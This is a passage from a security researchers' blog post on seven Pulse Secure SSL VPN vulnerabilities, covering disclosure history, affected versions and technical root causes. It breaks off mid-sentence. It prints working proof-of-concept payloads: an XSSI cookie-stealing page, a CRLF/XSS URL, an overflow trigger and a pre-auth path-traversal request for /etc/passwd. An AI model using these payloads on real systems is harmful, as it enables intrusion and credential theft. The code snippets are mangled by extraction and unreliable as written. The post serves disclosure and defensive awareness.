Author: Orange Tsai(@orange_8361) and Meh Chang(@mehqq_)

Hi, this is the last part of Attacking SSL VPN series. If you haven’t read previous articles yet, here are the quick links for you:

Infiltrating Corporate Intranet Like NSA: Pre-auth RCE on Leading SSL VPNs

Attacking SSL VPN - Part 1: PreAuth RCE on Palo Alto GlobalProtect, with Uber as Case Study!

Attacking SSL VPN - Part 2: Breaking the Fortigate SSL VPN

After we published our research at Black Hat, due to its great severity and huge impacts, it got lots of attention and discussions. Many people desire first-hand news and wonder when the exploit(especially the Pulse Secure preAuth one) will be released.

We also discussed this internally. Actually, we could simply drop the whole exploits without any concern and acquire plenty of media exposures. However, as a SECURITY firm, our responsibility is to make the world more secure. So we decided to postpone the public disclosure to give the world more time to apply the patches!

Unfortunately, the exploits were revealed by someone else. They can be easily found on GitHub[1] [2] [3] and exploit-db[1]. Honestly, we couldn’t say they are wrong, because the bugs are absolutely fixed several months ago, and they spend their time differenting/reversing/reproducing. But it’s indeed a worth discussing question to the security community: if you have a nuclear level weapon, when is it ready for public disclosure?

We hear about more than 25 bug bounty programs are exploited. From the statistics of Bad Packet, numerous Fortune 500, U.S. military, governments, financial institutions and universities are also affected by this. There are even 10 NASA servers exposed for this bug. So, these premature public discovers indeed force these entities to upgrade their SSL VPN, this is the good part.

On the other hand, the bad part is that there is an increasing number of botnets scanning the Internet in the meanwhile. An intelligence also points out that there is already a China APT group exploiting this bug. This is such an Internet disaster. Apparently, the world is not ready yet. So, if you haven’t updated your Palo Alto, Fortinet or Pulse Secure SSL VPN, please update it ASAP!

About Pulse Secure

Pulse Secure is the market leader of SSL VPN which provides professional secure access solutions for Hybrid IT. Pulse Secure has been in our research queue for a long time because it was a critical infrastructure of Google, which is one of our long-term targets. However, Google applies the Zero Trust security model, and therefore the VPN is removed now.

We started to review Pulse Secure in mid-December last year. In the first 2 months, we got nothing. Pulse Secure has a good coding style and security awareness so that it’s hard to find trivial bugs. Here is an interesting comparison, we found the arbitrary file reading CVE-2018-13379 on FortiGate SSL VPN on our first research day…

Pulse Secure is also a Perl lover, and writes lots of Perl extensions in C++. The interaction between Perl and C++ is also confusing to us, but we got more familiar with it while we paid more time digging in it. Finally, we got the first blood onMarch 8, 2019! It’s a stack-based overflow on the management interface! Although this bug isn’t that useful, our research progress got on track since that, and we uncovered more and more bugs.

We reported all of our finding to Pulse Secure PSIRT onMarch 22, 2019. Their response is very quick and they take these vulnerabilities seriously! After several conference calls with Pulse Secure,they fixed all bugs just within a month, and released the patches onApril 24, 2019. You can check the detailed security advice!

It’s a great time to work with Pulse Secure. From our perspective, Pulse Secure is the most responsible vendor among all SSL VPN vendors we have reported bugs to!

Vulnerabilities

We have found 7 vulnerabilities in total. Here is the list. We will introduce each one but focus on the CVE-2019-11510 and CVE-2019-11539 more.

CVE-2019-11510 - Pre-auth Arbitrary File Reading

CVE-2019-11542 - Post-auth(admin) Stack Buffer Overflow

CVE-2019-11539 - Post-auth(admin) Command Injection

CVE-2019-11538 - Post-auth(user) Arbitrary File Reading via NFS

CVE-2019-11508 - Post-auth(user) Arbitrary File Writing via NFS

CVE-2019-11540 - Post-auth Cross-Site Script Inclusion

CVE-2019-11507 - Post-auth Cross-Site Scripting

And here are affected versions:

Pulse Connect Secure 9.0R1 - 9.0R3.3

Pulse Connect Secure 8.3R1 - 8.3R7

Pulse Connect Secure 8.2R1 - 8.2R12

Pulse Connect Secure 8.1R1 - 8.1R15

Pulse Policy Secure 9.0R1 - 9.0R3.3

Pulse Policy Secure 5.4R1 - 5.4R7

Pulse Policy Secure 5.3R1 - 5.3R12

Pulse Policy Secure 5.2R1 - 5.2R12

Pulse Policy Secure 5.1R1 - 5.1R15

CVE-2019-11540: Cross-Site Script Inclusion

The script /dana/cs/cs.cgi renders the session ID in JavaScript. As the content-type is set to application/x-javascript, we could perform the XSSI attack to steal the DSID cookie!

Even worse, the CSRF protection in Pulse Secure SSL VPN is based on the DSID. With this XSSI, we can bypass all the CSRF protection!

PoC:

1234567891011!-- http://attacker/malicious.html --script src='https://sslvpn/dana/cs/cs.cgi?action=appletobj'/scriptscript window.onload=function() { window.document.writeln=function (msg) { if (msg.indexOf('DSID')=0) alert(msg) } ReplaceContent() }/script

CVE-2019-11507: Cross-Site Scripting

There is a CRLF Injection in /dana/home/cts_get_ica.cgi. Due to the injection, we can forge arbitrary HTTP headers and inject malicious HTML contents.

PoC:

1234https://sslvpn/dana/home/cts_get_ica.cgi?bm_id=xvdi=1appname=aa%0d%0aContent-Type:text/html%0d%0aContent-Disposition:inline%0d%0aaa:bbsvg/onload=alert(document.domain)

CVE-2019-11538: Post-auth(user) Arbitrary File Reading via NFS

The following two vulnerabilities (CVE-2019-11538 and CVE-2019-11508) do not affect default configurations. It appears only if the admin configures the NFS sharing for the VPN users.

If an attacker can control any files on remote NFS server, he can just create a symbolic link to any file, such as /etc/passwd, and read it from web interface. The root cause is that the implementation of NFS mounts the remote server as a real Linux directory, and the script /dana/fb/nfs/nfb.cgi does not check whether the accessed file is a symlink or not!

CVE-2019-11508: Post-auth(user) Arbitrary File Writing via NFS

This one is a little bit similar to the previous one, but with a different attack vector!

When the attacker uploads a ZIP file to the NFS through the web interface, the script /dana/fb/nfs/nu.cgi does not sanitize the filename in the ZIP. Therefore, an attacker can build a malicious ZIP file and traverse the path with ./in the filename! Once Pulse Secure decompresses, the attacker can upload whatever he wants to whatever path!

CVE-2019-11542: Post-auth(admin) Stack Buffer Overflow

There is a stack-based buffer overflow in the following Perl module implementations:

DSHC:ConsiderForReporting

DSHC:isSendReasonStringEnabled

DSHC:getRemedCustomInstructions

These implementations use sprintf to concatenate strings without any length check, which leads to the buffer overflow. The bug can be triggered in many places, but here we use /dana-admin/auth/hc.cgi as our PoC.

123https://sslvpn/dana-admin/auth/hc.cgi?platform=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAApolicyid=0And you can observed the segment fault from dmesg

1cgi-server[22950]: segfault at 61616161 ip 00000000002a80afd sp 0000000ff9a4d50 error 4 in DSHC.so[2a2f000+87000]

CVE-2019-11510: Pre-auth Arbitrary File Reading

Actually, this is the most severe bug in this time. It is in the web server implementation. As our slides mentioned, Pulse Secure implements their own web server and architecture stack from scratch. The original path validation is very strict. However, since version 8.2, Pulse Secure introduced a new feature called HTML5 Access, it’s a feature used to interact with Telnet, SSH, and RDP by browsers. Thanks to this new feature, the original path validation becomes loose.

In order to handle the static resources, Pulse Secure created a new IF-CONDITION to widen the originally strict path validation. The code wrongly uses the request-uri and request-filepath, so that we can specify the /dana/html5acc/guacamole/in the end of the query string to bypass the validation and make request-filepath to any file you want to download!

And it’s worth to mention that in order to read arbitrary files, you must to specify the /dana/html5acc/guacamole/in the middle of the path again. Otherwise, you can only download limited file extensions such as .json,xml or .html.

Due to the exploit is in the wild, there is no longer any concern to show the payload:

1234import requestsr=requests.get('https://sslvpn/dana-na/./dana/html5acc/guacamole/./././././././etc/passwd?/dana/html5acc/guacamole/')print r.content

CVE-2019-11539: Post-auth(admin) Command Injection

The last one is a command injection on the management interface. We found this vulnerability very early, but could not find a way to exploit it at first. While we were in Vegas, one of my friends told m